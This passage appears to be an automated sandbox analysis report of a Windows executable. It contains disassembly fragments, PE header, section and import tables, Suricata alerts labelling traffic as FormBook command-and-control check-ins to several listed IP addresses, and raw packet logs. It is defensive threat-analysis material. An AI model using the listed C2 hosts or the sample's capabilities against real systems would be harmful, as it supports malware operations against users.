mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F6660E18B2Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F6660E18B78h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F6660E18B61h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0xb088c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x185000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0xb088c	0xb0a00	a98012cfc9657de995a75f309821710a	False	0.9627551641012031	data	7.961811731995351	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x185000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0xa7b54	data			1.000314441604118
RT_GROUP_ICON	0x18430c	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x184384	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x184398	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1843ac	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1843c0	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x18449c	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-06T16:02:38.855871+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	60141	217.160.0.160	80	TCP
2025-01-06T16:02:38.855871+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	60141	217.160.0.160	80	TCP
2025-01-06T16:02:54.443737+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60142	199.59.243.228	80	TCP
2025-01-06T16:02:57.007833+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60143	199.59.243.228	80	TCP
2025-01-06T16:02:59.576753+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60144	199.59.243.228	80	TCP
2025-01-06T16:03:02.082260+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	60145	199.59.243.228	80	TCP
2025-01-06T16:03:02.082260+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	60145	199.59.243.228	80	TCP
2025-01-06T16:03:15.780693+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60147	104.21.13.141	80	TCP
2025-01-06T16:03:18.384999+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60148	104.21.13.141	80	TCP
2025-01-06T16:03:20.889056+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60149	104.21.13.141	80	TCP
2025-01-06T16:03:23.481056+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	60156	104.21.13.141	80	TCP
2025-01-06T16:03:23.481056+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	60156	104.21.13.141	80	TCP
2025-01-06T16:03:29.254981+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60199	15.197.240.20	80	TCP
2025-01-06T16:03:31.804484+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60215	15.197.240.20	80	TCP
2025-01-06T16:03:34.387317+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60231	15.197.240.20	80	TCP
2025-01-06T16:03:37.960109+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	60248	15.197.240.20	80	TCP
2025-01-06T16:03:37.960109+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	60248	15.197.240.20	80	TCP
2025-01-06T16:03:43.690598+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60293	136.243.225.5	80	TCP
2025-01-06T16:03:46.239029+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60310	136.243.225.5	80	TCP
2025-01-06T16:03:48.790208+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60330	136.243.225.5	80	TCP
2025-01-06T16:03:51.335933+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	60346	136.243.225.5	80	TCP
2025-01-06T16:03:51.335933+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	60346	136.243.225.5	80	TCP
2025-01-06T16:03:57.100995+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60379	172.67.182.198	80	TCP
2025-01-06T16:03:59.671100+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60394	172.67.182.198	80	TCP
2025-01-06T16:04:02.225545+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60413	172.67.182.198	80	TCP
2025-01-06T16:04:04.751975+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	60430	172.67.182.198	80	TCP
2025-01-06T16:04:04.751975+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	60430	172.67.182.198	80	TCP
2025-01-06T16:04:10.405845+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60431	199.192.21.169	80	TCP
2025-01-06T16:04:13.021602+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60432	199.192.21.169	80	TCP
2025-01-06T16:04:15.501010+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60433	199.192.21.169	80	TCP
2025-01-06T16:04:18.080447+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	60434	199.192.21.169	80	TCP
2025-01-06T16:04:18.080447+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	60434	199.192.21.169	80	TCP
2025-01-06T16:04:24.857851+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60435	45.130.41.107	80	TCP
2025-01-06T16:04:27.227418+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60436	45.130.41.107	80	TCP
2025-01-06T16:04:29.934947+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60437	45.130.41.107	80	TCP
2025-01-06T16:04:32.005071+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	60438	45.130.41.107	80	TCP
2025-01-06T16:04:32.005071+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	60438	45.130.41.107	80	TCP
2025-01-06T16:04:38.813868+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60439	85.159.66.93	80	TCP
2025-01-06T16:04:41.357721+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60440	85.159.66.93	80	TCP
2025-01-06T16:04:43.904589+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60441	85.159.66.93	80	TCP
2025-01-06T16:04:45.649623+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	60442	85.159.66.93	80	TCP
2025-01-06T16:04:45.649623+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	60442	85.159.66.93	80	TCP
2025-01-06T16:04:51.212237+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60443	199.59.243.228	80	TCP
2025-01-06T16:04:53.765681+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60444	199.59.243.228	80	TCP
2025-01-06T16:04:56.318439+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60445	199.59.243.228	80	TCP
2025-01-06T16:04:58.888041+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	60446	199.59.243.228	80	TCP
2025-01-06T16:04:58.888041+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	60446	199.59.243.228	80	TCP
2025-01-06T16:05:05.873480+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60447	38.22.89.164	80	TCP
2025-01-06T16:05:08.423622+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60448	38.22.89.164	80	TCP
2025-01-06T16:05:10.969586+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60449	38.22.89.164	80	TCP
2025-01-06T16:05:33.412801+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	60450	38.22.89.164	80	TCP
2025-01-06T16:05:33.412801+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	60450	38.22.89.164	80	TCP
2025-01-06T16:05:39.983139+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60451	68.65.122.71	80	TCP
2025-01-06T16:05:42.530051+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60452	68.65.122.71	80	TCP
2025-01-06T16:05:45.077256+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60453	68.65.122.71	80	TCP
2025-01-06T16:05:48.793277+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	60454	68.65.122.71	80	TCP
2025-01-06T16:05:48.793277+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	60454	68.65.122.71	80	TCP
2025-01-06T16:06:12.920021+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60455	103.174.136.137	80	TCP
2025-01-06T16:06:16.978508+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	60456	103.174.136.137	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2025 16:02:25.411413908 CET	60140	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:02:25.416402102 CET	53	60140	1.1.1.1	192.168.2.8
Jan 6, 2025 16:02:25.416492939 CET	60140	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:02:25.421649933 CET	53	60140	1.1.1.1	192.168.2.8
Jan 6, 2025 16:02:25.873656034 CET	60140	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:02:25.878581047 CET	53	60140	1.1.1.1	192.168.2.8
Jan 6, 2025 16:02:25.880063057 CET	60140	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:02:38.203017950 CET	60141	80	192.168.2.8	217.160.0.160
Jan 6, 2025 16:02:38.207818985 CET	80	60141	217.160.0.160	192.168.2.8
Jan 6, 2025 16:02:38.207930088 CET	60141	80	192.168.2.8	217.160.0.160
Jan 6, 2025 16:02:38.217706919 CET	60141	80	192.168.2.8	217.160.0.160
Jan 6, 2025 16:02:38.222501993 CET	80	60141	217.160.0.160	192.168.2.8
Jan 6, 2025 16:02:38.854855061 CET	80	60141	217.160.0.160	192.168.2.8
Jan 6, 2025 16:02:38.855818987 CET	80	60141	217.160.0.160	192.168.2.8
Jan 6, 2025 16:02:38.855870962 CET	60141	80	192.168.2.8	217.160.0.160
Jan 6, 2025 16:02:38.858133078 CET	60141	80	192.168.2.8	217.160.0.160
Jan 6, 2025 16:02:38.862900972 CET	80	60141	217.160.0.160	192.168.2.8
Jan 6, 2025 16:02:53.983834982 CET	60142	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:02:53.988703966 CET	80	60142	199.59.243.228	192.168.2.8
Jan 6, 2025 16:02:53.989054918 CET	60142	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:02:54.003803968 CET	60142	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:02:54.008929014 CET	80	60142	199.59.243.228	192.168.2.8
Jan 6, 2025 16:02:54.443603992 CET	80	60142	199.59.243.228	192.168.2.8
Jan 6, 2025 16:02:54.443624973 CET	80	60142	199.59.243.228	192.168.2.8
Jan 6, 2025 16:02:54.443686008 CET	80	60142	199.59.243.228	192.168.2.8
Jan 6, 2025 16:02:54.443737030 CET	60142	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:02:54.443737030 CET	60142	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:02:55.513529062 CET	60142	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:02:56.532129049 CET	60143	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:02:56.536995888 CET	80	60143	199.59.243.228	192.168.2.8
Jan 6, 2025 16:02:56.537074089 CET	60143	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:02:56.552115917 CET	60143	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:02:56.556922913 CET	80	60143	199.59.243.228	192.168.2.8
Jan 6, 2025 16:02:57.007728100 CET	80	60143	199.59.243.228	192.168.2.8
Jan 6, 2025 16:02:57.007740974 CET	80	60143	199.59.243.228	192.168.2.8
Jan 6, 2025 16:02:57.007751942 CET	80	60143	199.59.243.228	192.168.2.8
Jan 6, 2025 16:02:57.007833004 CET	60143	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:02:58.060538054 CET	60143	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:02:59.079585075 CET	60144	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:02:59.085701942 CET	80	60144	199.59.243.228	192.168.2.8
Jan 6, 2025 16:02:59.085804939 CET	60144	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:02:59.100295067 CET	60144	80	192.168.2.8	199.59.243.228
Jan 6, 2025 16:02:59.107098103 CET	80	60144	199.59.243.228	192.168.2.8
Jan 6, 2025 16:02:59.109916925 CET	80	60144	199.59.243.228	192.168.2.8
Jan 6, 2025 16:02:59.576628923 CET	80	60144	199.59.243.228	192.168.2.8
Jan 6, 2025 16:02:59.576642036 CET	80	60144	199.59.243.228	192.168.2.8
